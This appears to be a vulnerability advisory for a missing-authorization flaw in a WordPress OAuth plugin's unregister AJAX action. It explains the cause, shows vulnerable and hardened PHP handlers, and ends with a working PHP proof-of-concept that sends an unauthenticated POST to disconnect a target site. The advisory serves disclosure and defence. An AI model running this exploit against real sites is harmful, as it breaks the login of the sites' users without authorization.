Atomic Edge analysis of CVE-2026-7617 (metadata-based): This vulnerability is a Missing Authorization (CWE-862) issue in the Secufor_OAuth plugin (slug: wpoauth) up to version 1.0.7. The plugin fails to verify that a request to disconnect the site from its linked Secufor account is made by an authorized user. The CVSS score is 5.3 (medium), with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating low integrity impact but no confidentiality or availability impact. The vulnerability is exploitable by any unauthenticated attacker with network access.
Root Cause: The plugin exposes a WordPress AJAX action, likely 'secuforoauth_unregister_action', which is registered via the admin-ajax.php endpoint. The description states the plugin does not properly verify that a user is authorized to perform the action. Based on the CWE classification (Missing Authorization), Atomic Edge analysis infers that the AJAX handler lacks a capability check (e.g., current_user_can()) and may also omit nonce verification, allowing remote unauthenticated execution. The handler directly clears stored login tokens and user login configuration, disconnecting the WordPress site from its Secufor OAuth service.
Exploitation: An attacker crafts a POST request to /wp-admin/admin-ajax.php with the action parameter set to 'secuforoauth_unregister_action'. No authentication cookies or nonces are required. The request can be sent from any browser or script. The plugin processes the request and deletes the stored OAuth token and related configuration options from the WordPress database. This instantly severs the connection between the WordPress site and its Secufor account, disabling OAuth-based login for all users.
Remediation: The developer should add a capability check (e.g., current_user_can('manage_options')) to the AJAX handler function. A nonce verification using check_ajax_referer() should also be implemented to prevent cross-site request forgery. Without source code access, Atomic Edge analysis cannot confirm whether a patched version exists; the metadata indicates no patched version is available as of the report date.
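The following is an added illustration of the remediation described above, not the plugin's own code: a reconstruction of the handler shape the CWE-862 classification implies, beside a hardened version that drops the nopriv hook, verifies a nonce with check_ajax_referer() and requires manage_options. Only the AJAX action name comes from the advisory; the function, nonce and option names are hypothetical.

```php
<?php
// Added example. Function, nonce and option names are hypothetical; only the
// action name 'secuforoauth_unregister_action' is taken from the advisory.

// --- Vulnerable shape, as inferred from the metadata (not the plugin's source) ---
// Registered for both logged-in and anonymous (nopriv) requests, with no
// capability or nonce check, so any POST to admin-ajax.php runs it.
add_action( 'wp_ajax_secuforoauth_unregister_action', 'secufor_unregister_vulnerable' );
add_action( 'wp_ajax_nopriv_secuforoauth_unregister_action', 'secufor_unregister_vulnerable' );

function secufor_unregister_vulnerable() {
    delete_option( 'secufor_oauth_token' );  // hypothetical option names
    delete_option( 'secufor_oauth_config' );
    wp_send_json_success();
}

// --- Hardened version ---
// 1. No nopriv hook: unauthenticated requests are rejected by admin-ajax.php
//    before any plugin code runs.
// 2. check_ajax_referer() ties the request to a nonce issued for this action
//    (CSRF protection); on failure it calls wp_die( -1, 403 ).
// 3. current_user_can( 'manage_options' ) limits the action to administrators.
add_action( 'wp_ajax_secuforoauth_unregister_action', 'secufor_unregister_hardened' );

function secufor_unregister_hardened() {
    check_ajax_referer( 'secufor_unregister', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        // wp_send_json_error() terminates the request after sending the body.
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    delete_option( 'secufor_oauth_token' );
    delete_option( 'secufor_oauth_config' );
    wp_send_json_success( array( 'message' => 'Disconnected from Secufor.' ) );
}

// The settings page that offers the disconnect button must supply a matching
// nonce, here passed to the plugin's admin script as secuforAjax.nonce.
function secufor_enqueue_admin_script() {
    wp_enqueue_script( 'secufor-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'secufor-admin', 'secuforAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'secufor_unregister' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'secufor_enqueue_admin_script' );
```

With the hardened handler, the unauthenticated POST from the Exploitation section receives a 400 from admin-ajax.php (no nopriv hook), a logged-in request without the nonce gets 403, and a logged-in non-administrator with a valid nonce also gets 403.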
Impact: An unauthenticated attacker can disconnect the WordPress site from its Secufor OAuth provider. This disrupts the OAuth-based login mechanism, potentially locking out users who rely on Secufor credentials for authentication. The integrity impact is limited to the disconnection; no data is stolen or modified beyond the OAuth configuration.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7617 - Secufor_OAuth <= 1.0.7 - Missing Authorization to Unauthenticated Account Logout via 'secuforoauth_unregister_action' AJAX Action
// This PoC exploits a missing authorization vulnerability in the Secufor_OAuth plugin.
// The AJAX action 'secuforoauth_unregister_action' lacks capability and nonce checks,
// allowing an unauthenticated attacker to disconnect the WordPress site from its Secufor account.
// Configuration: change this to the target WordPress site URL
$target_url = 'http://example.com'; // No trailing slash

// Step 1: Send the POST request to the vulnerable AJAX handler
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'secuforoauth_unregister_action'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// Disable SSL verification for testing (do not use in production)
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if ($response === false) {
    // Transport-level failure (DNS, connection refused, TLS handshake, ...)
    echo "[-] Request failed: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 2: Analyze the response
if ($http_code === 200) {
    // The plugin may return a success response or an empty response.
    // A 200 status without errors suggests the action was processed.
    echo "[+] Exploit sent successfully. HTTP Status: $http_code\n";
    echo "[+] The WordPress site should now be disconnected from its Secufor account.\n";
} else {
    echo "[-] Exploit failed. HTTP Status: $http_code\n";
}